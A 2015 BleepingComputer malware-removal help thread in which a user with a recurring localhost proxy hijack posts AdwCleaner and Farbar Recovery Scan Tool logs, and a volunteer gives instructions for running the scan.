Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Proxy server


  • This topic is locked This topic is locked
18 replies to this topic

#1 Mohasaiyan

Mohasaiyan

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 06 June 2015 - 03:07 AM

I had this proxy server virus deal get on my cpu some how and I cannot manage to get rid of it. I have gotten rid of most of the malware on my cpu I think with hitmanpro, Malwarebites and adwcleaner but no matter what I remove the proxy server still resurfaces on my registry. I have also deleted and reinstalled chrome to no avail I am completely at a loss as to where to go next and any help would be much appreciated. Here is my most recent Adwcleaner log if you need anymore logs please let me know.

 

***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Data Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>
Data Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:55783;hxxps=127.0.0.1:55783
Value Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [DefaultConnectionSettings]
Value Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [SavedLegacySettings]
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v29.0.1 (en-US)
 
 
-\\ Google Chrome v43.0.2357.81
 
 
-\\ Chromium v
 
 
*************************


BC AdBot (Login to Remove)

 


#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:09:00 AM

Posted 08 June 2015 - 05:51 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop. Don't kill any malicious processes at your own.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked before you press the Scan button.
  • Press Scan button.
  • It will make 2 logs (FRST.txt and Addition.txt) in the same directory the tool is run. Please copy and paste them to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#3 Mohasaiyan

Mohasaiyan
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:00 AM

Posted 08 June 2015 - 12:02 PM

okay here are the scan results.

 

First

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-06-2015
Ran by dell 2 (administrator) on SEVILLE on 08-06-2015 12:56:54
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AuthenTec, Inc.) C:\Program Files\Fingerprint Sensor\ATService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(SurfRight B.V.) C:\Program Files\HitmanPro\hmpsched.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Broadcom Corporation) C:\Program Files\Broadcom\MgmtAgent\BrcmMgmtAgent.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
(Juniper Networks) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla server.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(O2Micro International) C:\Windows\System32\o2flash.exe
() C:\Windows\SysWOW64\srvany.exe
(O2Micro.) C:\Windows\SysWOW64\SDIOAssist.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\n360.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\n360.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\tv_x64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Blizzard Entertainment) C:\Program Files (x86)\Battle.net\Battle.net.5833\Battle.net.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Blizzard Entertainment) C:\ProgramData\Battle.net\Agent\Agent.4056\Agent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\nacl64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\conathst.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [408888 2015-04-07] (Power Software Ltd)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [2618680 2015-04-08] (Malwarebytes Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Steam] => C:\Program Files (x86)\Steam\Steam.exe [2892992 2015-06-04] (Valve Corporation)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Battle.net] => C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe [2860080 2015-06-05] (Blizzard Entertainment)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [31280256 2015-04-17] (Skype Technologies S.A.)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\MountPoints2: E - E:\Startup.exe
Lsa: [Authentication Packages] msv1_0 wvauth
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll [2011-03-04] (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [UninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll [2011-03-04] (Wave Systems Corp.)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:55783;https=127.0.0.1:55783
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.scientificamerican.com/
SearchScopes: HKLM-x32 -> {49606DC7-976D-4030-A74E-9FB5C842FA68} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll [2010-03-09] (Trend Micro Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-03-10] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll [2013-09-06] (McAfee, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll [2010-03-09] (Trend Micro Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\IPS\IPSBHO.DLL [2015-03-04] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-18] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-18] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://sslvpn.uc.edu/dana-cached/sc/JuniperSetupClient.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll [2010-03-09] (Trend Micro Inc.)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll [2010-03-09] (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{AE56321B-729F-4880-8BE3-0A8F58FDFAF3}: [NameServer] 8.8.8.8,8.8.4.4
 
FireFox:
========
FF ProfilePath: C:\Users\dell 2\AppData\Roaming\Mozilla\Firefox\Profiles\rwt78m02.default-1433511130034
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll [2015-06-06] ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2013-01-25] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll [2015-06-06] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1168638.dll [2012-10-04] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-18] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-18] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll [2013-09-06] (McAfee, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-09-22] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @raidcall.en/RCplugin -> C:\Users\dell 2\AppData\Roaming\raidcall\plugins\nprcplugin.dll [2014-05-27] (Raidcall)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-27] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2013-01-25] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @citrixonline.com/appdetectorplugin -> C:\Users\dell 2\AppData\Local\Citrix\Plugins\94\npappdetector.dll [2013-03-11] (Citrix Online)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @talk.google.com/GoogleTalkPlugin -> C:\Users\dell 2\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @talk.google.com/O1DPlugin -> C:\Users\dell 2\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @tools.google.com/Google Update;version=3 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll No File
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @tools.google.com/Google Update;version=9 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll No File
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: google.com/WidevineMediaOptimizer -> C:\Users\dell 2\AppData\Roaming\IDM\bin\npwidevinemediaoptimizer.dll [2014-06-09] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\dell 2\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\dell 2\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Adblock Plus - C:\Users\dell 2\AppData\Roaming\Mozilla\Firefox\Profiles\rwt78m02.default-1433511130034\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-06-08]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-05-01]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension [2011-06-15]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2015-06-08]
 
Chrome: 
=======
CHR Profile: C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-07]
CHR Extension: (Google Docs) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-07]
CHR Extension: (Google Drive) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-07]
CHR Extension: (YouTube) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-07]
CHR Extension: (Adblock Plus) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-06-08]
CHR Extension: (Google Search) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-07]
CHR Extension: (Google Sheets) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-07]
CHR Extension: (Bookmark Manager) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-06-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-06-07]
CHR Extension: (Norton Security Toolbar) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2015-06-08]
CHR Extension: (Google Wallet) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-06-07]
CHR Extension: (Gmail) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-07]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx [2015-06-08]
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [akhdblbjebmbllhinponghfmaekhlhob] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\DELL2~1\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [Not Found]
